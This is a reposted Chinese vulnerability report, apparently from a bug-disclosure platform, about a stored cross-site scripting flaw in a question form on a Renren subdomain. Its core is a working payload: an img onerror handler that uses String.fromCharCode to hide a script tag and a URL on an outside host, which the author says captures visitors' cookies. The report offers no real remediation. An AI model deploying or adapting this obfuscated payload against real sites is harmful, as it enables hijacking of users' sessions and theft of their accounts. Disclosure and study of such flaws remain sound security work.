网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

人人网某分站存储型xss第二弹 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 存储型xss,可打cookie,引用某牛的话勿头痛医头脚痛医脚详细说明:http: dellcqg renren com Qa ask 单引号被转义构造img src=1 onerror=document body appendChild(document createElement(String fromCh...

存储型xss,可打cookie,引用某牛的话勿头痛医头脚痛医脚

详细说明:

http://dellcqg.renren.com/Qa/ask 单引号被转义

构造

<img src=1 onerror=document.body.appendChild(document.createElement(String.fromCharCode(115,99,114,105,112,116))).src=String.fromCharCode(104,116,116,112,58,47,47,121,108,97,120,102,99,121,46,53,48,48,121,117,110,46,99,111,109,47,120,120,120,120,115,115,120,120,120,46,106,115)>



可打到cookie

漏洞证明:





 

修复方案:

我是菜鸟,厂商比我懂的

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论